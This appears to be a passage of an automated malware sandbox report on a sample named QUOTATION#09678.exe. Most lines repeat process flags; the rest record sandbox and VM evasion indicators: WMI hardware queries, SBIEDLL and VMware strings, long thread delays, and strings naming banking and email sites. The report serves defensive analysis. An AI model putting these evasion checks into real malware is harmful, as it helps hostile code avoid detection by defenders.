Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: QUOTATION#09678.exe PID: 6704, type: MEMORYSTR

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: QUOTATION#09678.exe, 00000000.00000002.1680211636.000001D8B9585000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: QUOTATION#09678.exe, 00000000.00000002.1680211636.000001D8B9585000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Memory allocated: 1D8B76A0000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Memory allocated: 1D8D11D0000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Window / User API: threadDelayed 779	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5702	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3889	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 1785	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 7299	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7872

Thread sleep time: -11990383647911201s >= -30000s

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: Amcache.hve.16.dr	Binary or memory string: VMware
Source: tmp7D68.tmp.11.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: tmp7D68.tmp.11.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: tmp7D68.tmp.11.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: QUOTATION#09678.exe, 00000000.00000002.1680211636.000001D8B9585000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: tmp7D68.tmp.11.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: tmp7D68.tmp.11.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: Amcache.hve.16.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: tmp7D68.tmp.11.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: tmp7D68.tmp.11.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: QUOTATION#09678.exe, 00000000.00000002.1680211636.000001D8B9585000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: QUOTATION#09678.exe, 00000000.00000002.1680211636.000001D8B9585000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE
Source: tmp7D68.tmp.11.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: tmp7D68.tmp.11.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: Amcache.hve.16.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: tmp7D68.tmp.11.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: Amcache.hve.16.dr	Binary or memory string: vmci.sys
